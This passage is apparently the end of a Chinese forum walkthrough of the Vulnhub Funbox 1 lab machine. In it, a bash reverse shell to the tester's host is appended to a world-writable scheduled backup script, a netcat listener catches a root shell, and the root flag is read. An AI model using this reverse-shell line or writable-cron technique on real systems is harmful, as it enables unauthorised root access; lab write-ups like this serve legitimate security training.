echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

复制代码

.reminder.sh提醒backup.sh为计划任务，而该文件任何人都有可写权限

www-data@funbox:/home/funny$ cat .backup.sh
cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
www-data@funbox:/home/funny$ which nano
which nano
/usr/bin/nano
www-data@funbox:/home/funny$ nano .backup.sh
nano .backup.sh
Error opening terminal: unknown.
www-data@funbox:/home/funny$ echo 'bash -i >& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
<>& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
www-data@funbox:/home/funny$ cat .backup.sh
cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
bash -i >& /dev/tcp/192.168.56.146/9999 0>&1

复制代码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 9999
[sudo] password for kali:
listening on [any] 9999 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 35070
bash: cannot set terminal process group (2518): Inappropriate ioctl for device
bash: no job control in this shell
root@funbox:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:~# cd /root
cd /root
root@funbox:~# ls
ls
flag.txt
mbox
snap
root@funbox:~# cat flag.txt
cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~#

复制代码

至此实现了root提权，并拿到了root flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

		自动登录	找回密码
密码			立即注册

Vulnhub之Funbox 1靶机详细测试过程

0 个回复

快速回复

楼主热帖

标签云